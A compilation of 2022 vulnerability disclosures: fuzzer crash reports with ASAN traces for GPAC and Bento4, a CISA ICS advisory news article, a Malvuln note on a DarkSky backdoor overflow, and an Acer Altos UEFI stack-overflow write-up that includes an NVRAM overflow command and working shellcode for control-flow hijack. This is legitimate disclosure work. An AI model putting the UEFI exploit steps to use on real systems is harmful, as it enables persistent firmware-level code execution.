GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c.

**Description**

Heap-buffer-overflow in isomedia/box\_funcs.c:2074 in gf\_isom\_box\_dump\_start\_ex

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -diso mp4box-diso-heap-buffer-over-flow-1
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-diso-heap-buffer-over-flow-1

**ASAN**

    
    [iso file] Read Box type 04@0004 (0x04400004) at position 94 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "meta" (start 32) has 206 extra bytes
    [iso file] Box "uuid" (start 4061) has 58 extra bytes
    [iso file] Incomplete box mdat - start 4151 size 54847
    [iso file] Incomplete file while reading for dump - aborting parsing
    =================================================================
    ==18099==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000540 at pc 0x7f54a04dd880 bp 0x7ffcec3ea7e0 sp 0x7ffcec3ea7d0
    READ of size 1 at 0x604000000540 thread T0
        #0 0x7f54a04dd87f in gf_isom_box_dump_start_ex isomedia/box_funcs.c:2074
        #1 0x7f54a04dd87f in gf_isom_box_dump_start isomedia/box_funcs.c:2093
        #2 0x7f54a04c0ae7 in trgt_box_dump isomedia/box_dump.c:5807
        #3 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108
        #4 0x7f54a0470ffa in gf_isom_box_array_dump isomedia/box_dump.c:104
        #5 0x7f54a04ddda8 in gf_isom_box_dump_done isomedia/box_funcs.c:2115
        #6 0x7f54a04c09d5 in trgr_box_dump isomedia/box_dump.c:5799
        #7 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108
        #8 0x7f54a04714d6 in gf_isom_dump isomedia/box_dump.c:138
        #9 0x55e8639f1804 in dump_isom_xml /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:2067
        #10 0x55e8639c1d79 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6364
        #11 0x7f549f4e0c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #12 0x55e8639920a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    0x604000000540 is located 0 bytes to the right of 48-byte region [0x604000000510,0x604000000540)
    allocated by thread T0 here:
        #0 0x7f54a2a4cb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
        #1 0x7f54a041bd12 in trgt_box_new isomedia/box_code_base.c:10623
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex
    Shadow bytes around the buggy address:
      0x0c087fff8050: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8060: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8070: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8090: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
    =>0x0c087fff80a0: fa fa 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
      0x0c087fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==18099==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43040: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex · Issue #2280 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function FixSDTPInTRAF at isomedia/isom_intern.c.

**Description**

Heap-buffer-overflow in isomedia/isom\_intern.c:227 in FixSDTPInTRAF

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -bt mp4box-bt-heap-buffer-over-flow-0
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-bt-heap-buffer-over-flow-0

**ASAN**

    [iso file] Unknown box type sjhm in parent sinf
    [iso file] Unknown box type sgp00 in parent stbl
    [iso file] Read Box type 00000000 (0x00000000) at position 2168 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "traf" (start 2028) has 458 extra bytes
    [iso file] Unknown box type shgp in parent traf
    =================================================================
    ==31145==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001914 at pc 0x7fe0339cbbf8 bp 0x7ffc2041a330 sp 0x7ffc2041a320
    READ of size 1 at 0x602000001914 thread T0
        #0 0x7fe0339cbbf7 in FixSDTPInTRAF isomedia/isom_intern.c:227
        #1 0x7fe0339cbbf7 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:663
        #2 0x7fe0339ce0e5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:866
        #3 0x7fe0339ce0e5 in gf_isom_open_file isomedia/isom_intern.c:986
        #4 0x55ec82396048 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6175
        #5 0x7fe032987c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #6 0x55ec823690a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    0x602000001914 is located 0 bytes to the right of 4-byte region [0x602000001910,0x602000001914)
    allocated by thread T0 here:
        #0 0x7fe035ef3b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
        #1 0x7fe0338a4541 in sdtp_box_read isomedia/box_code_base.c:8354
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/isom_intern.c:227 in FixSDTPInTRAF
    Shadow bytes around the buggy address:
      0x0c047fff82d0: fa fa 00 00 fa fa 00 00 fa fa 01 fa fa fa 00 00
      0x0c047fff82e0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fa
      0x0c047fff82f0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8300: fa fa 00 fa fa fa 00 00 fa fa 00 07 fa fa 00 00
      0x0c047fff8310: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
    =>0x0c047fff8320: fa fa[04]fa fa fa 00 00 fa fa 00 00 fa fa fa fa
      0x0c047fff8330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==31145==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43042: heap-buffer-overflow isomedia/isom_intern.c:227 in FixSDTPInTRAF · Issue #2278 · gpac/gpac

An issue was discovered in Bento4 v1.6.0-639. There is a heap buffer overflow vulnerability in the AP4_BitReader::SkipBits(unsigned int) function in mp42ts.

Hi, developers of Bento4:  
In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output:

\==10897==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ec3c at pc 0x0000004a9771 bp 0x7fffffffb150 sp 0x7fffffffb140  
READ of size 4 at 0x60300000ec3c thread T0  
#0 0x4a9770 in AP4\_BitReader::SkipBits(unsigned int) /root/Bento4/Source/C++/Core/Ap4Utils.cpp:564  
#1 0x53f5c5 in AP4\_Dac4Atom::AP4\_Dac4Atom(unsigned int, unsigned char const\*) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:396  
#2 0x543230 in AP4\_Dac4Atom::Create(unsigned int, AP4\_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:58  
#3 0x4f7503 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:776  
#4 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#5 0x51cd08 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#6 0x4826d1 in AP4\_SampleEntry::Read(AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115  
#7 0x4826d1 in AP4\_AudioSampleEntry::AP4\_AudioSampleEntry(unsigned int, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420  
#8 0x5d736d in AP4\_EncaSampleEntry::AP4\_EncaSampleEntry(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4Protection.cpp:74  
#9 0x4f4a3c in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:298  
#10 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#11 0x614618 in AP4\_StsdAtom::AP4\_StsdAtom(unsigned int, unsigned char, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101  
#12 0x615fc0 in AP4\_StsdAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57  
#13 0x4f838e in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458  
#14 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#15 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#16 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#17 0x51b986 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#18 0x4f5833 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#19 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#20 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#21 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#22 0x51b986 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#23 0x4f5833 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#24 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#25 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#26 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#27 0x51b986 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#28 0x4f5833 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#29 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#30 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#31 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#32 0x49cfb2 in AP4\_TrakAtom::AP4\_TrakAtom(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4TrakAtom.cpp:165  
#33 0x4f7709 in AP4\_TrakAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4TrakAtom.h:58  
#34 0x4f7709 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:413  
#35 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#36 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#37 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#38 0x430fac in AP4\_MoovAtom::AP4\_MoovAtom(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4MoovAtom.cpp:80  
#39 0x4f5430 in AP4\_MoovAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4MoovAtom.h:56  
#40 0x4f5430 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:393  
#41 0x4fb65a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#42 0x4fb65a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154  
#43 0x41c6af in AP4\_File::ParseStream(AP4\_ByteStream&, AP4\_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104  
#44 0x41c6af in AP4\_File::AP4\_File(AP4\_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78  
#45 0x404446 in main /root/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511  
#46 0x7ffff61bb83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#47 0x40ae38 in \_start (/root/Bento4/mp42ts+0x40ae38)

0x60300000ec3c is located 0 bytes to the right of 28-byte region \[0x60300000ec20,0x60300000ec3c)  
allocated by thread T0 here:  
#0 0x7ffff6f03712 in operator new\[\](unsigned long) (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x99712)  
#1 0x419645 in AP4\_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210  
#2 0x419645 in AP4\_DataBuffer::SetBufferSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Utils.cpp:564 AP4\_BitReader::SkipBits(unsigned int)  
Shadow bytes around the buggy address:  
0x0c067fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0c067fff9d80: fa fa fa fa 00 00 00\[04\]fa fa 00 00 00 02 fa fa  
0x0c067fff9d90: 00 00 00 02 fa fa 00 00 00 fa fa fa 00 00 00 fa  
0x0c067fff9da0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00  
0x0c067fff9db0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa  
0x0c067fff9dc0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa  
0x0c067fff9dd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Heap right redzone: fb  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack partial redzone: f4  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
\==10897==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/Bento4/mp42ts-hbo-00

**Validation steps**

git clone https://github.com/axiomatic-systems/Bento4  
cd Bento4/  
mkdir check\_build && cd check\_build  
cmake ../ -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="-fsanitize=address" -DCMAKE\_CXX\_FLAGS="-fsanitize=address" -DCMAKE\_BUILD\_TYPE=Release  
make -j  
./mp42ts mp42ts-hbo-00 /dev/null

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2022-43034: Heap-buffer-overflow with ASAN in mp42ts · Issue #764 · axiomatic-systems/Bento4

Acer Altos W2000h-W570h F4 R01.03.0018 was discovered to contain a stack overflow in the RevserveMem component. This vulnerability allows attackers to cause a Denial of Service (DoS) via injecting crafted shellcode into the NVRAM variable.

There is a stack buffer overflow vulnerability, which could lead to **arbitrary code execution in UEFI DXE driver** in the latest firmware of Acer's Altos servers. And all these affecting models are already end of life. So we decided to disclose the detail.

**Summary**

Previously, we did a lot of research in existing works in UEFI security, an example is that Binarly-IO found a lot of vulnerabilities since last year. And there is also a paper in S&P2022 mainly focused on SMM callout vulnerabilities. We believe that the security of UEFI ecosystem remains construction, so we started to do some trivial works.

This vulnerability is similar to our another one,which exists due to the incorrect use of the gRT->GetVariable service in driver ReserveMem.

Affecting models: Altos W2000h-W570h F4, the latest update in 2019.02.13

**Vulnerability Description**

Vulnerability exists in function located offset 0x32c in ReserveMem.

The latest firmware can be downloaded here: link.

\_\_int64 \_\_fastcall sub\_32C(\_\_int64 a1, \_\_int64 a2)
{
  ... ...
  // v18 is at offset 0x28 the parent funciton's ret address
  \_\_int64 v18; // \[rsp+EE0h\] \[rbp+DE0h\]  
  DataSize = 1827i64;  // There is a hardcode datasize
  // the omitted code haven't change the "DataSize"
  ... ...
  // DataSize > sizeof(v18), which can cause stack overflow.
  if ( gRT\->GetVariable(aReservememflag, &gSetupVariableGuid, 0i64, &DataSize, &v18) || (\_BYTE)v19 != (\_BYTE)v18 )
  
  ... ...
  return 0i64;
}

The hardcoded DataSize parameter is much bigger than the buffer on the stack, and if an attacker modifies the variable's value by either physical or local way, it is possible to trigger a stacke-based buffer overflow and eventually overwrite the return address. We can exploit it by update the value of the NVARM variable ReserveMemFlag.

**Vulnerability Analysis**

We first wrote a PoC script, which overwrote the return address to "AAAA".

We can simply use a nsh script to set the variable's value:

setvar ReserveMemFlag -guid ec87d643-eba4-4bb5-a1e5-3f3e36b20da9 -bs -rt -nv \=4141414141414141...4141414141414141

After running the script, the variable ReserveMemFlag has been set to a large string full of "AAAA".

Using gdb to debug, we can see that when the entry function of the driver tries to return, the return address has been overflowed to our payload.

And because the variable is stored in the NVRAM, the next time we try to load the driver, the shellcode will still be triggered thus cause an exception.

Since we are able to control the **RIP**, we can further write shellcode in the stack. There isn't ALSR or NX in UEFI DXE phase, so it's quite simple to construct the shellcode to perform a call to ConOut->OutputString.

Our shellcode is as following.

mov eax, 0x79ee018  ; SystemTable
mov edx, 0x0a
mov r8, \[rax+0x40\]  ; SystemTable->ConOut
mov rcx, r8
call \[r8+0x28\]      ; SystemTable->ConOut->SetAttribute
mov eax, 0x79ee018
mov edx, 0x7e2c47a   ; The string need to Output
mov r8, \[rax+0x40\]
mov rcx, r8
call \[r8+0x8\]       ; SystemTable->ConOut->OutputString
ret
db "Pwned by 10TG", 0x0 ; UTF-16LE

Run the script to set variable and load the driver; we can see that the control flow is hijacked and we successfully print a string.

In conclusion, an attacker can exploit this vulnerability to **execute arbitrary code in UEFI DXE phase**.

A **malicious code can be installed** which could **survive across an operating system (OS) boot process** and modify NVRAM area in SPI flash storage (to gain persistence on target platform).

**Credit**

This vulnerability credited to river-li(Zichuan Li) and cft789(Fangtao Cao) from Wuhan University.

CVE-2022-41415: vulnerabilities/CVE-2022-41415.md at main · 10TG/vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances.
This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances.

This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the system or allowing remote code execution."

The list of issues, which affect R-SeeNet Versions 2.4.17 and prior, is as follows -

*   **CVE-2022-3385 and CVE-2022-3386** (CVSS scores: 9.8) - Two stack-based buffer overflow flaws that could lead to remote code execution
*   **CVE-2022-3387** (CVSS score: 6.5) - A path traversal flaw that could enable a remote attacker to delete arbitrary PDF files

Patches have been made available in version R-SeeNet version 2.4.21 released on September 30, 2022.

Also published by CISA is an update to a December 2021 advisory about multiple flaws in Hitachi Energy Transformer Asset Performance Management (APM) Edge products that could render them inaccessible.

The 29 vulnerabilities, collectively assigned a CVSS score of 8.2, stem from security holes in open source software components such as OpenSSL, LibSSL, libxml2, and GRUB2 bootloader. Users are recommended to update to APM Edge version 4.0 to remediate the bugs.

The twin alerts come less than a week after CISA published 25 ICS advisories on October 13, 2022, spanning several vulnerabilities across devices from Siemens, Hitachi Energy, and Mitsubishi Electric.

According to OT cybersecurity and asset monitoring company SynSaber, 681 ICS product vulnerabilities were reported via CISA in the first half of 2022, out of which 152 are rated Critical, 289 are rated High, and 2015 are rated Medium in Severity.

What's more, 54 of the Critical/High-rated CVEs have no patch or any mitigation available from the vendors, accounting for 13% of the total reported flaws and remaining "forever-day vulnerabilities."

"It's important for asset owners and those defending critical infrastructure to understand when remediations are available, and how those remediations should be implemented and prioritized," SynSaber said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi

Backdoor.Win32.DarkSky.23 malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.DarkSky.23  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11.  
Family: DarkSky  
Type: PE32  
MD5: 1164ef21ef2af97e0339359c0dce5e7d  
Vuln ID: MVID-2022-0648  
Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 10/15/2022

Example:

0040134A | 80 34 31 11              | xor byte ptr ds:[ecx+esi],11            | ;XOR converting the payload happens here.  
0040134E | 41                       | inc ecx                                 |  
0040134F | 3B C8                    | cmp ecx,eax                             |  
00401351 | 7C F7                    | jl sysarchive.40134A                    |  
00401353 | 5E                       | pop esi                                 |  
00401354 | C3                       | ret                                     |

Python test...

>>> 0x41 ^ 0x11  
80  
>>> hex(80)  
'0x50'  
>>> chr(0x50)  
'P'

GET /AAAAA will then become all "P" ...

